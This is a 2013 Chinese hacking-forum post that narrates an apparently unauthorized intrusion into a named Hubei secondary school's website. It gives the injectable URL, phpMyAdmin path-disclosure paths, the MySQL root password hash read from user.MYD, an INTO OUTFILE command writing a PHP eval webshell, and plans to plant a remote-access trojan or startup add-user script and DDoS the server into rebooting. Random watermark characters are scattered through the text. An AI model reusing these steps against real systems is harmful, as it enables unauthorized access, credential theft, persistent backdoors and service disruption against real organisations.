找回密码
 立即注册
查看: 3069|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ {* [4 c6 ^* M' p+ K& ^* i
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
) `4 {3 r/ J# R0 {, Y  t
& G2 n9 I' u8 \6 q/ m2 X. G
# j' d: k4 F0 y# Q& d
8 C. ~2 X. W, x6 c4 i0 |2 p常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 6 ]  a, f% ~4 z) G4 h
7 S3 P9 J3 x* I- S3 Q
那么想可以直接写入shell ,getshell有几个条件:8 c* A1 v  `& j6 a+ j3 b0 k
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF3 P; O0 ^( y: n3 Q

! x( k8 c; U' c+ h/ a试着爆绝对路径:; z8 F6 D7 O/ C: i5 N) W
1./phpMyAdmin/index.php?lang[]=1  ' _" E1 {- S5 u, `, l
2./phpMyAdmin/phpinfo.php  
( t$ q! i" q( @  {: m; B3./load_file()  6 c  A7 x4 y: H$ D6 V# ~9 i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
$ b. h+ s, H: D* }5./phpmyadmin/libraries/select_lang.lib.php  
- @# [* T5 \- j2 x/ t. M" J$ @6./phpmyadmin/libraries/lect_lang.lib.php  
: T/ `' W# Q( L% t% x8 K7./phpmyadmin/libraries/mcrypt.lib.php   / \$ p# n1 p" o3 p% ?' t* ~
8./phpmyadmin/libraries/export/xls.php  
, k2 L# \2 Z$ ~2 O4 Q8 |# K7 f7 A- W9 z3 B
均不行...........................& U- m3 D+ i9 ^; Y3 ^) d& \: k$ [
( G+ d9 t  @1 O9 C: s) W9 [
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php% I9 V0 F8 \2 d8 Z. a* _4 O1 k6 }
, w9 D4 k0 M  T! _1 W
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
, u1 G9 x3 L: r% d+ u2 D; K6 G( p5 i) l# M, H. n
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! `: y. L/ j( e" [5 p8 x2 s6 A- a7 @5 q( W* r2 M) C
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
, }) O3 D) W: G# _! w! k. A# l+ R/ \1 G9 O
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" S. }8 l0 [3 G0 v
& X1 Z1 w: x- ?$ S$ ]+ t3 v* |http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 1 j' n6 a, y' s7 A$ C2 p+ f0 e$ L0 ~
) I1 k( F/ n  ]2 r3 J9 T" ?
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 d; h" `* [3 a! `

3 G6 `) O, `' j3 A3 E成功读到root密码:/ `- V. @+ I: N( r

" U; u" ~* s- S. l; Q0 n17---- r(0072)
$ G  _: U  V3 C6 m5 x: W18---- o(006f)
9 K* \6 O: t7 j5 W& [" p0 t19---- o(006f)" a$ K  ]' [, Y" a' M: s0 O
20---- t(0074): M1 i5 _- v2 J" O2 v) I
21---- *(002a)0 I6 P. ^- Y! A
22---- 8(0038)- z  W8 p1 \: j0 U* k! ?( B
23---- 2(0032)# M: Y$ w, T4 g/ T3 u2 h  B0 V! Z
24---- E(0045)* ]( M/ q, M4 Y; G2 [- Y
25---- 1(0031)  c- _' u+ }: K. q4 E7 Z( v
26---- C(0043)
4 F: Q7 q( P; L5 v+ ?& \27---- 5(0035)& F8 \! r: a1 @1 F0 z: i# h
28---- 8(0038)
5 e1 F1 U1 C9 s; C. A) |29---- 2(0032)
' l' {$ a0 }/ P. {. A30---- 8(0038): Q! s0 k- Y7 W8 ~
31---- A(0041)
# Q' c5 F% W! F32---- 9(0039)
: ~6 T% c; E, {' u  w6 H33---- B(0042); K* m, C) \5 Q3 r! c
34---- 5(0035); F1 n* [; |& ^# G! ]
35---- 4(0034); Q7 `5 ~6 C1 v5 C- g) t8 P
36---- 8(0038)! ^5 \7 q5 [# p, Y# c' [# M( G
37---- 6(0036)! |# A. H* G, w9 h6 A" [
38---- 4(0034)
* t/ v; S2 J( d! u' Q( e) |39---- 9(0039)' h! Q3 O9 [" s
40---- 1(0031)
0 @; _8 J. x" i# T; i" y' w41---- 1(0031)
4 \  r2 `% ~5 k0 M. ~42---- 5(0035)
' G0 x: |  `: k! D3 U43---- 3(0033)% A9 e: c, w8 G. M
44---- 5(0035)
0 X5 w' c, B, D3 S3 ]5 \- L45---- 9(0039)
5 t* Y5 K! O1 m46---- 8(0038)' r/ Q5 k3 o9 m6 Z
47---- F(0046)1 ]+ ?7 H. I* Z9 c
48---- F(0046)
% H7 t6 ]# x* F' q8 Y8 R; G' |49---- 4(0034)* Q2 S* C- e0 k5 a1 @# x/ `) a
50---- F(0046)2 F5 i' G5 D1 M# q: ?; c1 Q
51---- 0(0030)# I* z- y0 M; K8 h+ f
52---- 3(0033)
! ]8 b& y- R2 m6 K- w# ?. I53---- 2(0032)
1 Y/ R6 z& a0 D- h! L$ v54---- A(0041)
% ?8 }- h4 L4 `7 ^55---- 4(0034)
$ l, e; w. j+ s0 P56---- A(0041). A; k8 T! X) B+ S- e0 x1 k
57---- B(0042)+ x  d+ z' D* S
58---- *(0044)
, X9 Y& L8 N  p% S+ D59---- *(0035)* l& M( P2 g# {, `4 w
60---- *(0041)
" B% _1 T6 A' B1 B; V# S" u61---- *0032)
# p6 G. w% d' }& Z) c; J7 l: F* d% c$ w: S7 p5 E1 q
解密后成功登陆phpmyamin
, q% P. w5 A1 T+ Q/ B                          ' [  I8 _6 \" X: x
- L. h$ {8 M- \8 w' a& K! q
                             . r/ A( r' D8 E. O
/ a( ^. F% \0 ?! Z6 J, w! _# ?# D6 g
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'5 s' Y/ ]0 d2 [

9 e$ K6 O  G# Y! h$ ~" D成功执行,拿下shell,菜刀连接:  `$ p" Q$ b7 K9 C6 \* M
. p: H  a, A; w6 y) z
服务器不支持asp,aspx,php提权无果...................) ]( T8 X" r" Q/ ?

5 b$ U8 ?( L# u4 \4 O但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:+ _$ w# o8 q8 Z7 Q) y8 y- f0 ^: }
服务器上已经有个隐藏帐号了

1 y  Y( I# r5 x1 g1 J. b' }0 A
别名     administrators
  @" i' N, E) C3 }注释     管理员对计算机/域有不受限制的完全访问权

) ^5 V5 D/ b6 l* a/ N, }8 J1 M8 X2 G
成员

/ B) q7 r: p* h. _' q8 ^
-------------------------------------------------------------------------------
& p/ o) L! C) W; ]8 O- j; nadmin+ I, v9 o/ R! s  q1 Z- p- b
Administrator2 h; z+ r# G1 B% {$ c/ @
slipper$
6 d' a$ _; y5 Fsqluser4 i# z; `' J( R, a  k: |+ H' {
命令成功完成。
/ C2 x0 N- i% W# j9 }2 b4 E
3 X# E- _) b1 m服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。! I) Q$ q$ c/ o% E

- P/ N* I  a( Kddos服务器重启,不然就只能坐等服务器重启了...............................  s, z3 r) Q( |  j
: s9 U/ e; p% R" w' d. y/ r
      
7 m9 s: d2 N, O; b0 z, @& M

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表